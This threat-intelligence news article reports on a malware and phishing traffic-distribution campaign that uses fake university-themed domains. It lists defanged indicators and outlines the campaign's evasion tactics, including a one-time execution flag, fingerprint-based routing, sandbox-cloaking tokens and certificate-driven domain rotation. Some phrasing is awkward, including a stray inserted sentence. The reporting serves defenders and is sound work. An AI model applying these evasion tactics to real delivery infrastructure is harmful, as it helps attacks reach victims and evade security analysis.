Security researchers have discovered a sophisticated traffic distribution network that distributes malware and phishing attacks by using phony education-themed domains This article explores phishing content malware. . The operation, which is monitored under infrastructure indicators that point to TOXICSNAKE, tricked users into visiting malicious websites by using branding from reputable universities and educational institutions.

Cybercriminals running commodity malware-as-a-service operations can effectively use this tactic as a social engineering vector by taking advantage of users' trust in educational platforms. The attack campaign is centered on a multi-stage delivery mechanism intended to provide victims with phishing content, malware, and scam landing pages. Users first gain access when they come across landing pages that are falsely branded and imitate actual educational institutions. Obfuscated JavaScript code starts the infection chain in visitors' browsers as soon as they land on these phony education portals.

In order to prevent repeated detections, the first-stage loader has a hidden decoder that creates a remote URL and inserts malicious code into the page while also storing a one-time execution flag in browser storage. Macs-Hit analysts identified the malware infrastructure after recovering a JavaScript loader from the domain toxicsnake-wifes[. ]com, which acts as a traffic distribution system (TDS) node designed to route victims toward different payloads based on their geographic location, device type, and browser information.

The second stage makes an effort to retrieve upstream payloads; however, during their investigation, researchers encountered HTTP 504 errors, which indicate that upstream infrastructure was either inactive or blocked at the time of analysis.

According to the investigation, this is a coordinated cluster of domains with similar operational security patterns rather than an isolated incident. Pasangiklan[. ]top, asangiklan[.

]top, ourasolid[. ]com, refanprediction[. ]shop, and xelesex[. ]top are related domains that share a similar infrastructure and branding with an education theme.

Infrastructure and Strategies for Evasion Bulletproof hosting companies, particularly HZ Hosting Ltd (ASN AS202015), which upholds a permissive abuse policy, run the entire operation. The malicious domains rely on Regway nameservers and are registered using disposable WHOIS information, a common practice among cybercriminals operating in the CIS. In order to avoid widespread IP-based blocking, each domain is given a dedicated IP address, and all domains resolve to IP addresses within the 185.33.84.0/23 netblock.

The attackers leverage automated certificate generation through Let’s Encrypt, obtaining free TLS certificates valid for ninety-day periods. This method allows for quick infrastructure rotation and domain replacement. By routing various analysis environments to benign content while delivering real payloads to actual victims, the obfuscated JavaScript loader uses tokenization to generate unique session identifiers for each visitor, preventing security sandboxes from accurately analyzing the threat.

Set CSN as a Preferred Source in Google to Receive More Instant Updates from LinkedIn and X.